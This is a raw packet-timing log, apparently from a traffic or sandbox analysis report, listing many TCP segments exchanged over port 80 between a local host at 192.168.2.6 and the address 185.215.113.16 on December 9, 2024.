                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.263830900 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.263911963 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.264029980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.264106989 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.265064001 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.265141964 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.265639067 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.265708923 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.266375065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.266593933 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.266668081 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.267631054 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.267707109 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.267721891 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.267795086 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.268954039 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.269156933 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.269232035 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.270148993 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.270224094 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.270464897 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.270545006 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.271349907 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.271421909 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.271573067 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.271644115 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.272614002 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.272686005 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.272758007 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.272826910 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.273941040 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.274014950 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.274172068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.274240971 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.275152922 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.275422096 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.275494099 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.276551008 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.276634932 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.276885986 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.276957989 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.277676105 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.277749062 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.277781010 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.277842999 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371268034 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371393919 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371455908 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371949911 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371983051 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.371999025 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.372030020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.373228073 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.373272896 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.373822927 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.373862028 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.374754906 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.376406908 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397277117 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397332907 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397406101 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397512913 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397785902 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397830009 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.397967100 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.398850918 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.398904085 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.398930073 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.398964882 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.399872065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.399918079 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.399996996 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.400038004 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.400949001 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401053905 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401078939 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401113033 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401912928 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401932955 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401951075 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.401981115 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.402951956 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.403017044 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.403289080 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.403332949 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.403955936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.404001951 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.404282093 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.404323101 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.405086040 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.405131102 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.405210972 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.405389071 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.406066895 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.406609058 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.406665087 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.407032967 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.407252073 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.407299995 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.408113003 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.408166885 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.408268929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.408312082 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.409317970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.409359932 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.409529924 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.409590960 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.410137892 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.410214901 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.410417080 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.410459995 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.411161900 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.411200047 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.411654949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.411695957 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.412178040 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.412224054 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.412234068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.412272930 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.413367033 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.413378954 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.413424969 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.414443016 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.414490938 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.414608002 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.414647102 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.415360928 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.415410995 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.416567087 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.416579008 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.416608095 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.416616917 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.416651964 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.417431116 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.417498112 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.417668104 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.417712927 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.418443918 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.418495893 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.418869972 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.419112921 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.419414997 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.419471025 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.419687033 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.419749022 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.420444012 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.420526028 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.420826912 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.420877934 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.421449900 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.421498060 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.421842098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.421886921 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.422461033 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.422532082 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.422691107 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.422728062 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.423497915 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.423588991 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.423917055 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.423952103 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.424532890 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.424632072 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.425014973 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.425127029 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.425712109 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.425760984 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.426486969 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.426616907 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.426628113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.426642895 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.426662922 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.427615881 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.427676916 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.427858114 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.427892923 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.428636074 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.428683043 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.428719997 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.428833961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.429658890 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.429713964 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.429914951 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.429958105 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.430701971 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.430744886 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.430880070 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.430926085 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.431842089 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.431879044 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.432298899 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.432331085 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.432846069 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.432993889 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.433696032 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.433749914 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434425116 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434463978 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434540987 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434576035 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434813976 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434849024 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434932947 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.434983969 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.435869932 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.435936928 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.435950994 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.435970068 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.436901093 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.436945915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.437119007 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.437160015 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438067913 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438102961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438242912 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438287020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438882113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.438931942 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.439739943 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.439775944 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.440012932 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.440023899 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.440074921 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.440103054 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.440980911 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.441019058 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.441224098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.441304922 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.442120075 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.442177057 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.442238092 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.442373991 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.443131924 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.443166971 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.443232059 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.443273067 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.444067955 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.444144011 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.444178104 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.444227934 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.445106030 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.445161104 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446042061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446147919 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446244955 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446257114 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446285009 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.446299076 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.447238922 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.447278023 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.447514057 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.447581053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.563827038 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564107895 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564120054 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564174891 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564279079 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564321041 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564627886 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.564668894 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.565262079 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.565304041 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.565341949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.565382957 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.566349983 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.566391945 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.589716911 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.589844942 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.589917898 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.590079069 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.590125084 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.590183973 CET8049945185.215.113.16192.168.2.6
